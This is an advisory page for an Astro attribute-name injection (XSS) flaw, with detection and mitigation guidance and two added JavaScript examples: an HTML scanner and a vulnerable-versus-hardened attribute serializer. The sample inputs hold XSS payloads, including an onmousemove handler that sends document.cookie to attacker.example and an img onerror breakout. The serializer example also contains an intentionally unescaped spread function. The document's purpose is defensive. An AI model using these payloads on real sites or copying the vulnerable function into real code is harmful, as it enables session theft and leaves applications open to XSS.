CVE-2026-54298
Status: Analyzed - Analysis Complete
HTML Attribute Injection in Astro Framework

Publication date: 2026-06-22

Last updated on: 2026-06-22

Assigner: GitHub, Inc.

Description
Astro is a web framework. Prior to 6.4.6, the spreadAttributes function in Astro's server-side rendering pipeline iterates over object keys and passes them directly to addAttribute, which interpolates the key into the HTML output without escaping. When a developer uses the spread syntax {...props} on an HTML element and the object keys come from an untrusted source (API, CMS, URL parameters), an attacker can inject arbitrary HTML attributes including event handlers like onmousemove, onclick, or break out of the attribute context entirely to inject new elements. This vulnerability is fixed in 6.4.6.
Meta Information
Generated: 2026-06-23
EPSS evaluated: N/A
Source records: NVD, EUVD
Affected Vendors & Products
1 associated CPE
Vendor: astro
Product: astro
Version range: all versions before 6.4.6 (6.4.6 excluded)
CWE
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
Executive Summary

In Astro versions prior to 6.4.6, the spreadAttributes function in the server-side rendering pipeline iterates over the keys of the spread object and passes each key to addAttribute, which writes the key into the HTML output without escaping or validating it. The injection point is therefore the attribute name, not the attribute value. When a developer spreads an object onto an HTML element ({...props}) and an attacker controls that object's keys (for example through an API response, CMS content or URL parameters), a key such as onmousemove or onclick becomes an inline event handler, and a key containing a quote and a closing angle bracket breaks out of the attribute and tag context entirely, so arbitrary elements, and with them arbitrary JavaScript, end up in the served page.

Impact Analysis

This vulnerability can lead to Cross-Site Scripting (XSS) attacks, enabling attackers to execute arbitrary JavaScript in the context of the affected website. The attacker must control attribute keys, not merely values, so exposure is limited to components that spread an object of untrusted origin onto an element; where that object is stored content (a CMS record, for instance), the injected markup is rendered for every visitor of the page.

  • Session hijacking through cookie theft.
  • Credential theft via fake login forms or keyloggers.
  • Page defacement.
  • Redirection to attacker-controlled domains.
Detection Guidance

Start by finding every place where your Astro application uses the spread syntax {...props} on an HTML element, and for each occurrence trace where the object comes from. Only spreads whose keys can be chosen by an untrusted party (API responses, CMS fields, URL parameters) are affected; a spread of an object whose keys are fixed in your own code is not.

Then inspect the server-rendered HTML for attribute names your templates never emit: inline event handlers such as onmousemove or onclick, or malformed attribute names (stray quotes, angle brackets) that indicate a key broke out of the attribute context.

Because the injection happens during server-side rendering, the payload is already present in the HTTP response body, so response-side inspection (a WAF, a reverse proxy, or a log of rendered pages) can be monitored for unexpected on* attributes or unexpected elements.

The advisory provides no detection commands; practical approaches include:

  • Using grep or similar tools to search the codebase for the spread syntax {...props} in .astro components, then auditing the origin of each spread object.
  • Manually reviewing or scripting checks on rendered HTML output for unescaped attribute names or suspicious event handlers.
  • Using web vulnerability scanners that detect reflected or stored XSS, bearing in mind that a scanner only finds this variant if its payload actually ends up as an object key rather than as a value.
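The second bullet above, scripting a check over rendered output, as an added example that is not part of the advisory and not Astro's code. It is a regex tokenizer, not an HTML parser, so hits are leads rather than proof; it flags two signals on every start tag: attribute names that are inline event handlers (on*), and attribute names that are not syntactically valid, which is what a key that closed the attribute or tag context looks like after rendering. The sample HTML, the attacker host name and the function names are all constructed for the example.

```javascript
// Added example (not from the advisory, not Astro code): heuristic scan of
// server-rendered HTML for attribute names a template would never emit.

// start tag: name, then everything up to the closing ">"
const START_TAG = /<([a-zA-Z][a-zA-Z0-9-]*)([^>]*)>/g;
// attribute name, optionally followed by =value (double-quoted, single-quoted or bare);
// quotes are deliberately allowed inside the name so a broken-out key is still captured
const ATTRIBUTE = /([^\s=>]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;
const VALID_ATTRIBUTE_NAME = /^[a-zA-Z_:][a-zA-Z0-9_:.-]*$/;
const EVENT_HANDLER = /^on[a-z]+$/i;

// Returns one finding per suspicious attribute: { tag, attribute, reason }.
function scanRenderedHtml(html) {
  const findings = [];
  for (const tagMatch of html.matchAll(START_TAG)) {
    const [, tag, rawAttributes] = tagMatch;
    // drop the trailing "/" of a self-closing tag so it is not read as a name
    const attributeText = rawAttributes.replace(/\/\s*$/, '');
    for (const attrMatch of attributeText.matchAll(ATTRIBUTE)) {
      const name = attrMatch[1];
      if (EVENT_HANDLER.test(name)) {
        findings.push({ tag, attribute: name, reason: 'inline event handler' });
      } else if (!VALID_ATTRIBUTE_NAME.test(name)) {
        findings.push({ tag, attribute: name, reason: 'malformed attribute name' });
      }
    }
  }
  return findings;
}

// Constructed sample output of three rendered fragments: one clean, one where
// an injected key became an event handler, one where a key broke out of the
// attribute context and introduced a new element.
const SAMPLE_HTML = [
  '<div class="card" data-id="42">ok</div>',
  '<div onmousemove="fetch(\'//attacker.example/?c=\'+document.cookie)" class="card">handler</div>',
  '<div "><img src=x onerror=alert(1)>="" class="card">broken out</div>',
].join('\n');

for (const f of scanRenderedHtml(SAMPLE_HTML)) {
  console.log(`<${f.tag}> ${f.reason}: ${f.attribute}`);
}
```

On the sample the scan reports three findings: the onmousemove handler on the second div, the stray quote that the third div's injected key left behind as an attribute name, and the onerror handler on the img element that the same key smuggled in. Run it over a crawl of your rendered pages, or wire it into a test that renders each component with adversarial props.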
Mitigation Strategies

The primary mitigation is to upgrade Astro to version 6.4.6 or later, where this vulnerability is fixed.

Until the upgrade is applied, avoid using the spread syntax {...props} on HTML elements with objects whose keys come from untrusted sources such as APIs, CMS content or URL parameters; copy the specific attributes you need into a new object with fixed keys instead.

Where keys must be dynamic, validate them against an allowlist of expected attribute names, or at least against the syntax of a valid HTML attribute name, before they reach the element. Rejecting only keys that begin with on is not sufficient, because a key containing a quote or an angle bracket can close the attribute and tag context and introduce new elements.

Review your server-side rendering pipeline to ensure that attribute names, not just attribute values, are validated or escaped before they are written to the HTML output.
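The mechanism from the description and the key validation recommended above, as an added example that is not part of the advisory and is not Astro's spreadAttributes or addAttribute implementation. It is a deliberately small model of a spread-attribute serializer: the vulnerable variant writes the key into the markup verbatim, the hardened variant accepts only syntactically valid attribute names and refuses inline event handlers outright. The props object, the helper names and the rendered wrapper are constructed for the example.

```javascript
// Added example (not from the advisory, not Astro code): a minimal model of
// the bug class and of one way to close it.

// Escape an attribute value for use inside double quotes.
function escapeAttrValue(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Vulnerable: the key is interpolated into the HTML without escaping or
// validation, so whoever controls the keys controls the markup.
function spreadAttributesVulnerable(props) {
  let out = '';
  for (const [key, value] of Object.entries(props)) {
    out += ` ${key}="${escapeAttrValue(value)}"`;
  }
  return out;
}

// Hardened: a key must be a syntactically valid attribute name, and inline
// event handlers are refused. Note that the name check is the real control;
// filtering on* alone would still let a key close the tag with a quote and ">".
const VALID_ATTRIBUTE_NAME = /^[a-zA-Z_:][a-zA-Z0-9_:.-]*$/;
function spreadAttributesHardened(props) {
  let out = '';
  for (const [key, value] of Object.entries(props)) {
    if (!VALID_ATTRIBUTE_NAME.test(key)) {
      throw new Error(`invalid attribute name: ${JSON.stringify(key)}`);
    }
    if (/^on/i.test(key)) {
      throw new Error(`inline event handler refused: ${key}`);
    }
    out += ` ${key}="${escapeAttrValue(value)}"`;
  }
  return out;
}

// Constructed untrusted input, as if parsed from an API response: the
// attacker chose the keys, one an event handler, one that breaks out of the
// attribute and tag context.
const UNTRUSTED_PROPS = {
  class: 'card',
  onmousemove: 'alert(document.domain)',
  '"><img src=x onerror=alert(1)><b': 'x',
};

function renderVulnerable(props) {
  return `<div${spreadAttributesVulnerable(props)}>card</div>`;
}

function renderHardened(props) {
  return `<div${spreadAttributesHardened(props)}>card</div>`;
}

console.log('vulnerable:', renderVulnerable(UNTRUSTED_PROPS));
try {
  console.log('hardened:', renderHardened(UNTRUSTED_PROPS));
} catch (err) {
  console.log('hardened refused:', err.message);
}
console.log('hardened, fixed keys:', renderHardened({ class: 'card', 'data-id': '7' }));
```

The vulnerable render produces a div with an onmousemove handler followed by an injected img element, even though every value was escaped; the hardened render refuses the untrusted object at the first bad key and still renders an object with ordinary keys unchanged. In an application, the equivalent of this check belongs at the boundary where the untrusted object is built, before it is ever spread onto an element.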
